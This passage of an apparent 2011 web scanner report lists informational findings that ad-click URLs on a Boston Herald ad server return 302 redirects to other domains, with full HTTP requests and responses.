Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1639
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_w
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/1983280564/Right2/BostonHerald/HerbChambers_120x90/herbChambers120x90.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/HerbChambers_120x90/herbChambers120x90.gif" ALT="" BORDER="0"></A>
...[SNIP]...
//oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/249001598/Right3/BostonHerald/Quirk_Carfind_120x100_F2/carfind-tiny-ad.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_120x100_F2/carfind-tiny-ad.gif" ALT="" BORDER="0"></A>
...[SNIP]...
://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/www.carfind.com/L15/683665909/Top1/BostonHerald/Quirk_Carfind_468x60_F2/quirk468x60_Jan07.gif/72634857383031444f386b4144567663?x" target="new"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_468x60_F2/quirk468x60_Jan07.gif" ALT="" BORDER="0"></A>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663?1304732975

The response contains the following link to another domain:

http://hotjobs.yahoo.com/careers-912465-MJM_Construction

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/1304732975/Position1/BostonHerald/JobfindFeatured/MJMConstructionCorp.html/72634857383031444f386b4144567663?1304732975 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://hotjobs.yahoo.com/careers-912465-MJM_Construction
Content-Length: 334
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hotjobs.yahoo.com/careers-912465-MJM_Construction">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35?x

The response contains the following link to another domain:

http://www.herbchambers.com/

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/2007038988/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/72634857383031444f386741434e6f35?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.herbchambers.com
Content-Length: 305
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.herbchambers.com">here</a>.</p>
<hr>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35?x

The response contains the following link to another domain:

http://bostonherald.boocoo.com/

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/49256996/x16/BostonHerald/BooCoo_234x60/boocoo_BlueWhite_234x60.jpg/72634857383031444f386741434e6f35?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://bostonherald.boocoo.com/
Content-Length: 309
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://bostonherald.boocoo.com/">here</a>.</p>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663?855079761

The response contains the following link to another domain:

http://hotjobs.yahoo.com/careers-651789-Everett_Nursing_and_Rehabilitation_Center

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/855079761/Position2/BostonHerald/JobfindFeatured/EverettNursing.html/72634857383031444f386b4144567663?855079761 HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://hotjobs.yahoo.com/careers-651789-Everett_Nursing_and_Rehabilitation_Center
Content-Length: 359
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hotjobs.yahoo.com/careers-651789-Everett_Nursing_and_Rehabilitation_Center">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?
Content-Length: 600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?
Content-Length: 600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?
Content-Length: 596
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x

The response contains the following link to another domain:

http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?

The response contains the following link to another domain:

http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
